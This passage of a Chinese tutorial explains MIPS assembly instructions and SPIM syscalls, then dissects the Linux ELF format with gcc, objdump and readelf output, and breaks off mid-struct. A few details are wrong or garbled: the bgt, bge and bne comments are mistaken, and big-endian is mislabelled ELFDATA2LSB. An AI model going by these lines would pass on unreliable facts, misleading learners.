addi   $t2,$t3, 5    #  $t2 = $t3 + 5;
addu   $t1,$t6,$t7   #  $t1 = $t6 + $t7;跟无符号数那样相加
subu   $t1,$t6,$t7   #  $t1 = $t6 - $t7;跟无符号数那样相减

mult   $t3,$t4       # 运算结果存储在hi,lo（hi高位数据， lo地位数据）
div    $t5,$t6       #  Lo = $t5 / $t6   (整数商)
                     #  Hi = $t5 mod $t6   (求余数)
                     #商数存放在 lo, 余数存放在 hi
mfhi   $t0           #  把特殊寄存器 Hi 的值移动到 $t0 : $t0 = Hi
mflo   $t1           #  把特殊寄存器 Lo 的值移动到 $t1:   $t1 = Lo
#不能直接获取 hi 或 lo中的值， 需要mfhi, mflo指令传值给寄存器

move   $t2,$t3       #  $t2 = $t3

流程控制

分支 ( if-else )

条件分支的比较内置于指令中

              b target ＃无条件分支,直接到程序标签目标
              beq $t0, $t1, target ＃if $t0 = $ t1, 就跳到目标
              blt $t0, $t1, target ＃if $t0 <$ t1, 就跳到目标
              ble $t0, $t1, target ＃if $t0 <= $ t1, 就跳到目标
              bgt $t0, $t1, target ＃if $t0  $ t1, 就跳到目标
              bge $t0, $t1, target ＃if $t0  = $ t1, 就跳到目标
              bne    $t0, $t1, target #if  $t0 < $t1, 就跳到目标

跳转 ( while, for, goto )

 j     target #看到就跳， 不用考虑任何条件
 jr    $t3    #类似相对寻址，跳到该寄存器给出的地址处

子程序调用

子程序调用：“ 跳转和链接 ” 指令

       jal sub_label ＃“跳转和链接”

将当前的程序计数器保存到 $ra 中
跳转到 sub_label 的程序语句

子程序返回：“跳转寄存器”指令

       jr $ra       ＃“跳转寄存器”

跳转到$ ra中的地址（由jal指令存储）

注意：寄存地址存储在寄存器 $ra 中; 如果子例程将调用其他子例程，或者是递归的，则返回地址应该从 $ra 复制到栈以保留它，因为 jal 总是将返回地址放在该寄存器中，因此将覆盖之前的值

系统调用和 I / O（针对 SPIM 模拟器）

通过系统调用实现从输入/输出窗口读取或打印值或字符串，并指示程序结束
syscall
首先在寄存器 $v0 和 $a0 - $a1中提供适当的值
寄存器 $v0 中存储返回的结果值（如果有的话）

下表列出了可能的 系统调用 服务。

Service 服务	Code in `$v0` 对应功能的调用码	Arguments 所需参数	Results 返回值
print 一个整型数	`$v0` = 1	`$a0` = 要打印的整型数
print 一个浮点数	`$v0` = 2	`$f12` = 要打印的浮点数
print 双精度数	`$v0` = 3	`$f12` = 要打印的双精度数
print 字符串	`$v0` = 4	`$a0` = 要打印的字符串的地址
读取 ( read ) 整型数	`$v0` = 5		`$v0` = 读取的整型数
读取 ( read ) 浮点数	`$v0` = 6		`$v0` = 读取的浮点数
读取 ( read ) 双精度数	`$v0`= 7		`$v0` = 读取的双精度
读取 ( read ) 字符串	`$v0` = 8	将读取的字符串地址赋值给 `$a0`; 将读取的字符串长度赋值给 `$a1`
这个应该和 C 语言的 `sbrk()` 函数一样	`$v0` = 9	需要分配的空间大小（单位目测是字节 bytes）	将分配好的空间首地址给 `$v0`
exit	`$v0` =10	这个还要说吗.....= _ =

- print_string 即 print 字符串 服务期望启动以 null 结尾的字符串。指令.asciiz 创建一个以 null 结尾的字符串。
read_int，read_float 和 read_double 服务读取整行输入，包括换行符\n。
- ```
read_string
```
  服务与 UNIX 库例程 fgets 具有相同的语义。
  - 它将最多 n-1 个字符读入缓冲区，并以空字符终止字符串。
  - 如果当前行中少于 n-1 个字符，则它会读取并包含换行符，并使用空字符终止该字符串。
  - 就是输入过长就截取，过短就这样，最后都要加一个终止符。
- sbrk 服务将地址返回到包含 n 个附加字节的内存块。这将用于动态内存分配。
- 退出服务使程序停止运行
例子 : 打印一个存储在 $2 的整型数

 li $v0, 1    #声明需要调用的操作代码为 1 ( print_int ), 然后赋值给 $v0
 move $a0, $t2 #把这个要打印的整型数赋值给 $a0
 syscall #让操作系统执行我们的操作

例子 : 读取一个数，并且存储到内存中的 int_value 变量中

li $v0, 5 #声明需要调用的操作代码为 5 ( read_int ), 然后赋值给 $v0
syscall #让操作系统执行我们的操作, 然后 $v0 = 5
sw    $v0, int_value #通过写入（store_word)指令 将 $v0 的值（5）存入内存中

例子 : 打印一个字符串 ( 这是完整的，其实上面例子都可以直接替换 main: 部分，都能直接运行 )

              .data
 string1             .asciiz       "Print this.\n"             # 字符串变量声明
                                          # .asciiz 指令使字符串 null 终止

              .text
 main: li     $v0, 4               # 将适当的系统调用代码加载到寄存器 $v0 中
                                   # 打印字符串， 赋值对应的操作代码 $v0 = 4
              la     $a0, string1  # 将要打印的字符串地址赋值  $a0 = address(string1)
              syscall              # 让操作系统执行打印操作


 要指示程序结束, 应该退出系统调用, 所以最后一行代码应该是这个 :
              li     $v0, 10　　　  #对着上面的表, 不用说了吧
              syscall              # 让操作系统结束这一切吧 !

补充 : MIPS 指令格式

R格式

6	5	5	5	5	6
op	rs	rt	rd	shamt	funct

用处：寄存器 - 寄存器 ALU 操作读写专用寄存器

I格式

6	5	5	16
op	rs	rt	立即数操作

用处：加载/存储字节，半字，字，双字条件分支，跳转，跳转并链接寄存器

J格式

6	26
op	跳转地址

用处：跳转，跳转并链接陷阱和从异常中返回

各字段含义： op : 指令基本操作，称为操作码。 rs : 第一个源操作数寄存器。 rt : 第二个源操作数寄存器。 rd : 存放操作结果的目的操作数。 shamt : 位移量； funct : 函数，这个字段选择 op 操作的某个特定变体。

例：

add $t0,$s0,$s1

表示$t0=$s0+$s1,即 16 号寄存器（ s0 ) 的内容和 17 号寄存器 ( s1 ) 的内容相加，结果放到 8 号寄存器 ( t0 )。指令各字段的十进制表示为：

0	16	17	8	0	32

op = 0 和 funct = 32 表示这是加法， 16 = $s0 表示第一个源操作数 ( rs ) 在 16 号寄存器里，

17 = $s1 表示第二个源操作数 ( rt ) 在 17 号寄存器里， 8 = $t0 表示目的操作数 ( rd ) 在 8 号寄存器里。把各字段写成二进制，为：

000000	10000	10001	01000	00000	100000

这就是上述指令的机器码（ machine code ), 可以看出是很有规则性的。

补充 : MIPS 常用指令集

lb/lh/lw : 从存储器中读取一个 byte / half word / word 的数据到寄存器中.

如lb $1, 0($2) sb/sh/sw : 把一个 byte / half word / word 的数据从寄存器存储到存储器中.

如 sb $1, 0($2) add/addu : 把两个定点寄存器的内容相加

add $1,$2,$3($1=$2+$3); u 为不带符号加

addi/addiu : 把一个寄存器的内容加上一个立即数

add $1,$2,#3($1=$2+3); u 为不带符号加 sub/subu ：把两个定点寄存器的内容相减 div/divu : 两个定点寄存器的内容相除 mul/mulu : 两个定点寄存器的内容相乘 and/andi : 与运算，两个寄存器中的内容相与

and $1,$2,$3($1=$2 & $3);i为立即数。 or/ori : 或运算。 xor/xori : 异或运算。 beq/beqz/benz/bne : 条件转移 eq 相等，z 零，ne 不等 j/jr/jal/jalr : j 直接跳转；jr 使用寄存器跳转 lui : 把一个 16 位的立即数填入到寄存器的高 16 位，低 16 位补零 sll/srl : 逻辑左移 / 右移

sll $1,$2,#2 slt/slti/sltui : 如果 $2 的值小于 $3，那么设置 $1 的值为 1,否则设置 $1 的值为 0

slt $1,$2,$3 mov/movz/movn : 复制，n 为负，z 为零

mov $1,$2; movz $1,$2,$3 ( $3 为零则复制 $2 到 $1 ) trap : 根据地址向量转入管态 eret : 从异常中返回到用户态

Linux ELF

一个实例

在 1.5.1节 C语言基础 中我们看到了从源代码到可执行文件的全过程，现在我们来看一个更复杂的例子。

#include<stdio.h>

int global_init_var = 10;
int global_uninit_var;

void func(int sum) {
    printf("%d\n", sum);
}

void main(void) {
    static int local_static_init_var = 20;
    static int local_static_uninit_var;

    int local_init_val = 30;
    int local_uninit_var;

    func(global_init_var + local_init_val +
         local_static_init_var );
}

然后分别执行下列命令生成三个文件：

gcc -m32 -c elfDemo.c -o elfDemo.o

gcc -m32 elfDemo.c -o elfDemo.out

gcc -m32 -static elfDemo.c -o elfDemo_static.out

使用 ldd 命令打印所依赖的共享库：

$ ldd elfDemo.out
        linux-gate.so.1 (0xf77b1000)
        libc.so.6 => /usr/lib32/libc.so.6 (0xf7597000)
        /lib/ld-linux.so.2 => /usr/lib/ld-linux.so.2 (0xf77b3000)
$ ldd elfDemo_static.out
        not a dynamic executable

elfDemo_static.out 采用了静态链接的方式。

使用 file 命令查看相应的文件格式：

$ file elfDemo.o
elfDemo.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped

$ file elfDemo.out
elfDemo.out: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=50036015393a99344897cbf34099256c3793e172, not stripped

$ file elfDemo_static.out
elfDemo_static.out: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=276c839c20b4c187e4b486cf96d82a90c40f4dae, not stripped

$ file -L /usr/lib32/libc.so.6
/usr/lib32/libc.so.6: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib32/ld-linux.so.2, BuildID[sha1]=ee88d1b2aa81f104ab5645d407e190b244203a52, for GNU/Linux 3.2.0, not stripped

于是我们得到了 Linux 可执行文件格式 ELF （Executable Linkable Format）文件的三种类型：

可重定位文件（Relocatable file）
- 包含了代码和数据，可以和其他目标文件链接生成一个可执行文件或共享目标文件。
- elfDemo.o
可执行文件（Executable File）
- 包含了可以直接执行的文件。
- elfDemo_static.out
共享目标文件（Shared Object File）
- 包含了用于链接的代码和数据，分两种情况。一种是链接器将其与其他的可重定位文件和共享目标文件链接起来，生产新的目标文件。另一种是动态链接器将多个共享目标文件与可执行文件结合，作为进程映像的一部分。
- elfDemo.out
- libc-2.25.so

此时他们的结构如图：

可以看到，在这个简化的 ELF 文件中，开头是一个“文件头”，之后分别是代码段、数据段和.bss段。程序源代码编译后，执行语句变成机器指令，保存在.text段；已初始化的全局变量和局部静态变量都保存在.data段；未初始化的全局变量和局部静态变量则放在.bss段。

把程序指令和程序数据分开存放有许多好处，从安全的角度讲，当程序被加载后，数据和指令分别被映射到两个虚拟区域。由于数据区域对于进程来说是可读写的，而指令区域对于进程来说是只读的，所以这两个虚存区域的权限可以被分别设置成可读写和只读，可以防止程序的指令被改写和利用。

elfDemo.o

接下来，我们更深入地探索目标文件，使用 objdump 来查看目标文件的内部结构:

$ objdump -h elfDemo.o

elfDemo.o:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .group        00000008  00000000  00000000  00000034  2**2
                  CONTENTS, READONLY, GROUP, LINK_ONCE_DISCARD
  1 .text         00000078  00000000  00000000  0000003c  2**0
                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
  2 .data         00000008  00000000  00000000  000000b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  3 .bss          00000004  00000000  00000000  000000bc  2**2
                  ALLOC
  4 .rodata       00000004  00000000  00000000  000000bc  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .text.__x86.get_pc_thunk.ax 00000004  00000000  00000000  000000c0  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  6 .comment      00000012  00000000  00000000  000000c4  2**0
                  CONTENTS, READONLY
  7 .note.GNU-stack 00000000  00000000  00000000  000000d6  2**0
                  CONTENTS, READONLY
  8 .eh_frame     0000007c  00000000  00000000  000000d8  2**2
                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, DATA

可以看到目标文件中除了最基本的代码段、数据段和 BSS 段以外，还有一些别的段。注意到 .bss 段没有 CONTENTS 属性，表示它实际上并不存在，.bss 段只是为为未初始化的全局变量和局部静态变量预留了位置而已。

代码段

$ objdump -x -s -d elfDemo.o
......
Sections:
Idx Name          Size      VMA       LMA       File off  Algn

......

  1 .text         00000078  00000000  00000000  0000003c  2**0
                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
......
Contents of section .text:
 0000 5589e553 83ec04e8 fcffffff 05010000  U..S............
 0010 0083ec08 ff75088d 90000000 005289c3  .....u.......R..
 0020 e8fcffff ff83c410 908b5dfc c9c38d4c  ..........]....L
 0030 240483e4 f0ff71fc 5589e551 83ec14e8  $.....q.U..Q....
 0040 fcffffff 05010000 00c745f4 1e000000  ..........E.....
 0050 8b880000 00008b55 f401ca8b 80040000  .......U........
 0060 0001d083 ec0c50e8 fcffffff 83c41090  ......P.........
 0070 8b4dfcc9 8d61fcc3                    .M...a..
......
Disassembly of section .text:

00000000 <func>:
   0:   55                      push   %ebp
   1:   89 e5                   mov    %esp,%ebp
   3:   53                      push   %ebx
   4:   83 ec 04                sub    $0x4,%esp
   7:   e8 fc ff ff ff          call   8 <func+0x8>
                        8: R_386_PC32   __x86.get_pc_thunk.ax
   c:   05 01 00 00 00          add    $0x1,%eax
                        d: R_386_GOTPC  _GLOBAL_OFFSET_TABLE_
  11:   83 ec 08                sub    $0x8,%esp
  14:   ff 75 08                pushl  0x8(%ebp)
  17:   8d 90 00 00 00 00       lea    0x0(%eax),%edx
                        19: R_386_GOTOFF        .rodata
  1d:   52                      push   %edx
  1e:   89 c3                   mov    %eax,%ebx
  20:   e8 fc ff ff ff          call   21 <func+0x21>
                        21: R_386_PLT32 printf
  25:   83 c4 10                add    $0x10,%esp
  28:   90                      nop
  29:   8b 5d fc                mov    -0x4(%ebp),%ebx
  2c:   c9                      leave  
  2d:   c3                      ret

0000002e <main>:
  2e:   8d 4c 24 04             lea    0x4(%esp),%ecx
  32:   83 e4 f0                and    $0xfffffff0,%esp
  35:   ff 71 fc                pushl  -0x4(%ecx)
  38:   55                      push   %ebp
  39:   89 e5                   mov    %esp,%ebp
  3b:   51                      push   %ecx
  3c:   83 ec 14                sub    $0x14,%esp
  3f:   e8 fc ff ff ff          call   40 <main+0x12>
                        40: R_386_PC32  __x86.get_pc_thunk.ax
  44:   05 01 00 00 00          add    $0x1,%eax
                        45: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
  49:   c7 45 f4 1e 00 00 00    movl   $0x1e,-0xc(%ebp)
  50:   8b 88 00 00 00 00       mov    0x0(%eax),%ecx
                        52: R_386_GOTOFF        global_init_var
  56:   8b 55 f4                mov    -0xc(%ebp),%edx
  59:   01 ca                   add    %ecx,%edx
  5b:   8b 80 04 00 00 00       mov    0x4(%eax),%eax
                        5d: R_386_GOTOFF        .data
  61:   01 d0                   add    %edx,%eax
  63:   83 ec 0c                sub    $0xc,%esp
  66:   50                      push   %eax
  67:   e8 fc ff ff ff          call   68 <main+0x3a>
                        68: R_386_PC32  func
  6c:   83 c4 10                add    $0x10,%esp
  6f:   90                      nop
  70:   8b 4d fc                mov    -0x4(%ebp),%ecx
  73:   c9                      leave  
  74:   8d 61 fc                lea    -0x4(%ecx),%esp
  77:   c3                      ret

Contents of section .text 是 .text 的数据的十六进制形式，总共 0x78 个字节，最左边一列是偏移量，中间 4 列是内容，最右边一列是 ASCII 码形式。下面的 Disassembly of section .text 是反汇编结果。

数据段和只读数据段

......
Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  2 .data         00000008  00000000  00000000  000000b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  4 .rodata       00000004  00000000  00000000  000000bc  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
......
Contents of section .data:
 0000 0a000000 14000000                    ........
Contents of section .rodata:
 0000 25640a00                             %d..
.......

.data 段保存已经初始化了的全局变量和局部静态变量。elfDemo.c 中共有两个这样的变量，global_init_var 和 local_static_init_var，每个变量 4 个字节，一共 8 个字节。由于小端序的原因，0a000000 表示 global_init_var 值（10）的十六进制 0x0a，14000000 表示 local_static_init_var 值（20）的十六进制 0x14。

.rodata 段保存只读数据，包括只读变量和字符串常量。elfDemo.c 中调用 printf 的时候，用到了一个字符串变量 %d\n，它是一种只读数据，保存在 .rodata 段中，可以从输出结果看到字符串常量的 ASCII 形式，以 \0 结尾。

BSS段

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  3 .bss          00000004  00000000  00000000  000000bc  2**2
                  ALLOC

.bss 段保存未初始化的全局变量和局部静态变量。

ELF 文件结构

对象文件参与程序链接（构建程序）和程序执行（运行程序）。ELF 结构几相关信息在 /usr/include/elf.h　文件中。

ELF 文件头（ELF Header） 在目标文件格式的最前面，包含了描述整个文件的基本属性。
程序头表（Program Header Table） 是可选的，它告诉系统怎样创建一个进程映像。可执行文件必须有程序头表，而重定位文件不需要。
段（Section） 包含了链接视图中大量的目标文件信息。
段表（Section Header Table） 包含了描述文件中所有段的信息。

32位数据类型

名称	长度	对其	描述	原始类型
Elf32_Addr	4	4	无符号程序地址	uint32_t
Elf32_Half	2	2	无符号短整型	uint16_t
Elf32_Off	4	4	无符号偏移地址	uint32_t
Elf32_Sword	4	4	有符号整型	int32_t
Elf32_Word	4	4	无符号整型	uint32_t

文件头

ELF 文件头必然存在于 ELF 文件的开头，表明这是一个 ELF 文件。定义如下：

typedef struct
{
  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
  Elf32_Half    e_type;         /* Object file type */
  Elf32_Half    e_machine;      /* Architecture */
  Elf32_Word    e_version;      /* Object file version */
  Elf32_Addr    e_entry;        /* Entry point virtual address */
  Elf32_Off e_phoff;        /* Program header table file offset */
  Elf32_Off e_shoff;        /* Section header table file offset */
  Elf32_Word    e_flags;        /* Processor-specific flags */
  Elf32_Half    e_ehsize;       /* ELF header size in bytes */
  Elf32_Half    e_phentsize;        /* Program header table entry size */
  Elf32_Half    e_phnum;        /* Program header table entry count */
  Elf32_Half    e_shentsize;        /* Section header table entry size */
  Elf32_Half    e_shnum;        /* Section header table entry count */
  Elf32_Half    e_shstrndx;     /* Section header string table index */
} Elf32_Ehdr;

typedef struct
{
  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
  Elf64_Half    e_type;         /* Object file type */
  Elf64_Half    e_machine;      /* Architecture */
  Elf64_Word    e_version;      /* Object file version */
  Elf64_Addr    e_entry;        /* Entry point virtual address */
  Elf64_Off e_phoff;        /* Program header table file offset */
  Elf64_Off e_shoff;        /* Section header table file offset */
  Elf64_Word    e_flags;        /* Processor-specific flags */
  Elf64_Half    e_ehsize;       /* ELF header size in bytes */
  Elf64_Half    e_phentsize;        /* Program header table entry size */
  Elf64_Half    e_phnum;        /* Program header table entry count */
  Elf64_Half    e_shentsize;        /* Section header table entry size */
  Elf64_Half    e_shnum;        /* Section header table entry count */
  Elf64_Half    e_shstrndx;     /* Section header string table index */
} Elf64_Ehdr;

e_ident 保存着 ELF 的幻数和其他信息，最前面四个字节是幻数，用字符串表示为 \177ELF，其后的字节如果是 32 位则是 ELFCLASS32 (1)，如果是 64 位则是 ELFCLASS64 (2)，再其后的字节表示端序，小端序为 ELFDATA2LSB (1)，大端序为 ELFDATA2LSB (2)。最后一个字节则表示 ELF 的版本。

现在我们使用 readelf 命令来查看 elfDome.out 的文件头：

$ readelf -h elfDemo.out
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x3e0
  Start of program headers:          52 (bytes into file)
  Start of section headers:          6288 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         30
  Section header string table index: 29

程序头

程序头表是由 ELF 头的 e_phoff 指定的偏移量和 e_phentsize、e_phnum 共同确定大小的表格组成。e_phentsize 表示表格中程序头的大小，e_phnum 表示表格中程序头的数量。

程序头的定义如下：

typedef struct
{
  Elf32_Word    p_type;         /* Segment type */
  Elf32_Off p_offset;       /* Segment file offset */
  Elf32_Addr    p_vaddr;        /* Segment virtual address */
  Elf32_Addr    p_paddr;        /* Segment physical address */
  Elf32_Word    p_filesz;       /* Segment size in file */
  Elf32_Word    p_memsz;        /* Segment size in memory */
  Elf32_Word    p_flags;        /* Segment flags */
  Elf32_Word    p_align;        /* Segment alignment */
} Elf32_Phdr;

typedef struct
{
  Elf64_Word    p_type;         /* Segment type */
  Elf64_Word    p_flags;        /* Segment flags */
  Elf64_Off p_offset;       /* Segment file offset */
  Elf64_Addr    p_vaddr;        /* Segment virtual address */
  Elf64_Addr    p_paddr;        /* Segment physical address */
  Elf64_Xword   p_filesz;       /* Segment size in file */
  Elf64_Xword   p_memsz;        /* Segment size in memory */
  Elf64_Xword   p_align;        /* Segment alignment */
} Elf64_Phdr;

使用 readelf 来查看程序头：

$ readelf -l elfDemo.out

Elf file type is DYN (Shared object file)
Entry point 0x3e0
There are 9 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x00000034 0x00000034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x00000154 0x00000154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x00000000 0x00000000 0x00780 0x00780 R E 0x1000
  LOAD           0x000ef4 0x00001ef4 0x00001ef4 0x00130 0x0013c RW  0x1000
  DYNAMIC        0x000efc 0x00001efc 0x00001efc 0x000f0 0x000f0 RW  0x4
  NOTE           0x000168 0x00000168 0x00000168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x000624 0x00000624 0x00000624 0x00044 0x00044 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
  GNU_RELRO      0x000ef4 0x00001ef4 0x00001ef4 0x0010c 0x0010c R   0x1

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag .note.gnu.build-id
   06     .eh_frame_hdr
   07
   08     .init_array .fini_array .dynamic .got

段

段表（Section Header Table）是一个以 Elf32_Shdr　结构体为元素的数组，每个结构体对应一个段，它描述了各个段的信息。ELF 文件头的 e_shoff　成员给出了段表在 ELF 中的偏移，e_shnum 成员给出了段描述符的数量，e_shentsize 给出了每个段描述符的大小。

typedef struct
{
  Elf32_Word    sh_name;        /* Section name (string tbl index) */
  Elf32_Word    sh_type;        /* Section type */
  Elf32_Word    sh_flags;       /* Section flags */
  Elf32_Addr    sh_addr;        /* Section virtual addr at execution */
  Elf32_Off sh_offset;      /* Section file offset */
  Elf32_Word    sh_size;        /* Section size in bytes */
  Elf32_Word    sh_link;        /* Link to another section */
  Elf32_Word    sh_info;        /* Additional section information */
  Elf32_Word    sh_addralign;       /* Section alignment */
  Elf32_Word    sh_entsize;     /* Entry size if section holds table */
} Elf32_Shdr;

typedef struct
{
  Elf64_Word    sh_name;        /* Section name (string tbl index) */
  Elf64_Word    sh_type;        /* Section type */
  Elf64_Xword   sh_flags;       /* Section flags */
  Elf64_Addr    sh_addr;        /* Section virtual addr at execution */
  Elf64_Off sh_offset;      /* Section file offset */
  Elf64_Xword   sh_size;        /* Section size in bytes */
  Elf64_Word    sh_link;        /* Link to another section */
  Elf64_Word    sh_info;        /* Additional section information */
  Elf64_Xword   sh_addralign;       /* Section alignment */
  Elf64_Xword   sh_entsize;     /* Entry size if section holds table */
} Elf64_Shdr;

使用 readelf 命令查看目标文件中完整的段：

$ readelf -S elfDemo.o
There are 15 section headers, starting at offset 0x41c:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     12  16  4
  [ 2] .text             PROGBITS        00000000 00003c 000078 00  AX  0   0  1
  [ 3] .rel.text         REL             00000000 000338 000048 08   I 12   2  4
  [ 4] .data             PROGBITS        00000000 0000b4 000008 00  WA  0   0  4
  [ 5] .bss              NOBITS          00000000 0000bc 000004 00  WA  0   0  4
  [ 6] .rodata           PROGBITS        00000000 0000bc 000004 00   A  0   0  1
  [ 7] .text.__x86.get_p PROGBITS        00000000 0000c0 000004 00 AXG  0   0  1
  [ 8] .comment          PROGBITS        00000000 0000c4 000012 01  MS  0   0  1
  [ 9] .note.GNU-stack   PROGBITS        00000000 0000d6 000000 00      0   0  1
  [10] .eh_frame         PROGBITS        00000000 0000d8 00007c 00   A  0   0  4
  [11] .rel.eh_frame     REL             00000000 000380 000018 08   I 12  10  4
  [12] .symtab           SYMTAB          00000000 000154 000140 10     13  13  4
  [13] .strtab           STRTAB          00000000 000294 0000a2 00      0   0  1
  [14] .shstrtab         STRTAB          00000000 000398 000082 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  p (processor specific)

注意，ELF 段表的第一个元素是被保留的，类型为 NULL。

字符串表

字符串表以段的形式存在，包含了以 null　结尾的字符序列。对象文件使用这些字符串来表示符号和段名称，引用字符串时只需给出在表中的偏移即可。字符串表的第一个字符和最后一个字符为空字符，以确保所有字符串的开始和终止。通常段名为 .strtab 的字符串表是 字符串表（Strings Table），段名为 .shstrtab 的是段表字符串表（Section Header String Table）。

偏移	+0	+1	+2	+3	+4	+5	+6	+7	+8	+9
+0	\0	h	e	l	l	o	\0	w	o	r
+10	l	d	\0	h	e	l	l	o	w	o
+20	r	l	d	\0

偏移	字符串
0	空字符串
1	hello
7	world
13	helloworld
18	world

可以使用 readelf 读取这两个表：

$ readelf -x .strtab elfDemo.o

Hex dump of section '.strtab':
  0x00000000 00656c66 44656d6f 2e63006c 6f63616c .elfDemo.c.local
  0x00000010 5f737461 7469635f 696e6974 5f766172 _static_init_var
  0x00000020 2e323139 35006c6f 63616c5f 73746174 .2195.local_stat
  0x00000030 69635f75 6e696e69 745f7661 722e3231 ic_uninit_var.21
  0x00000040 39360067 6c6f6261 6c5f696e 69745f76 96.global_init_v
  0x00000050 61720067 6c6f6261 6c5f756e 696e6974 ar.global_uninit
  0x00000060 5f766172 0066756e 63005f5f 7838362e _var.func.__x86.
  0x00000070 6765745f 70635f74 68756e6b 2e617800 get_pc_thunk.ax.
  0x00000080 5f474c4f 42414c5f 4f464653 45545f54 _GLOBAL_OFFSET_T
  0x00000090 41424c45 5f007072 696e7466 006d6169 ABLE_.printf.mai
  0x000000a0 6e00

$ readelf -x .shstrtab elfDemo.o

Hex dump of section '.shstrtab':
  0x00000000 002e7379 6d746162 002e7374 72746162 ..symtab..strtab
  0x00000010 002e7368 73747274 6162002e 72656c2e ..shstrtab..rel.
  0x00000020 74657874 002e6461 7461002e 62737300 text..data..bss.
  0x00000030 2e726f64 61746100 2e746578 742e5f5f .rodata..text.__
  0x00000040 7838362e 6765745f 70635f74 68756e6b x86.get_pc_thunk
  0x00000050 2e617800 2e636f6d 6d656e74 002e6e6f .ax..comment..no
  0x00000060 74652e47 4e552d73 7461636b 002e7265 te.GNU-stack..re
  0x00000070 6c2e6568 5f667261 6d65002e 67726f75 l.eh_frame..grou
  0x00000080 7000

符号表

目标文件的符号表保存了定位和重定位程序的符号定义和引用所需的信息。符号表索引是这个数组的下标。索引０指向表中的第一个条目，作为未定义的符号索引。

typedef struct
{
  Elf32_Word    st_name;        /* Symbol name (string tbl index) */
  Elf32_Addr    st_value;       /* Symbol value */
  Elf32_Word    st_size;        /* Symbol size */
  unsigned char st_info;        /* Symbol type and binding */
  unsigned char st_other;       /* Symbol visibility */
  Elf32_Section st_shndx;       /* Section index */
} Elf32_Sym;

typedef struct
{
  Elf64_Word    st_name;        /* Symbol name (string tbl index) */
  unsigned char st_info;        /* Symbol type and binding */
  unsigned char st_other;       /* Symbol visibility */
  Elf64_Section st_shndx;       /* Section index */
  Elf64_Addr    st_value;       /* Symbol value */
  Elf64_Xword   st_size;        /* Symbol size */
} Elf64_Sym;

查看符号表：

$ readelf -s elfDemo.o

Symbol table '.symtab' contains 20 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS elfDemo.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    2
     3: 00000000     0 SECTION LOCAL  DEFAULT    4
     4: 00000000     0 SECTION LOCAL  DEFAULT    5
     5: 00000000     0 SECTION LOCAL  DEFAULT    6
     6: 00000004     4 OBJECT  LOCAL  DEFAULT    4 local_static_init_var.219
     7: 00000000     4 OBJECT  LOCAL  DEFAULT    5 local_static_uninit_var.2
     8: 00000000     0 SECTION LOCAL  DEFAULT    7
     9: 00000000     0 SECTION LOCAL  DEFAULT    9
    10: 00000000     0 SECTION LOCAL  DEFAULT   10
    11: 00000000     0 SECTION LOCAL  DEFAULT    8
    12: 00000000     0 SECTION LOCAL  DEFAULT    1
    13: 00000000     4 OBJECT  GLOBAL DEFAULT    4 global_init_var
    14: 00000004     4 OBJECT  GLOBAL DEFAULT  COM global_uninit_var
    15: 00000000    46 FUNC    GLOBAL DEFAULT    2 func
    16: 00000000     0 FUNC    GLOBAL HIDDEN     7 __x86.get_pc_thunk.ax
    17: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_
    18: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND printf
    19: 0000002e    74 FUNC    GLOBAL DEFAULT    2 main

重定位

重定位是连接符号定义与符号引用的过程。可重定位文件必须具有描述如何修改段内容的信息，从而运行可执行文件和共享对象文件保存进程程序映像的正确信息。

typedef struct
{
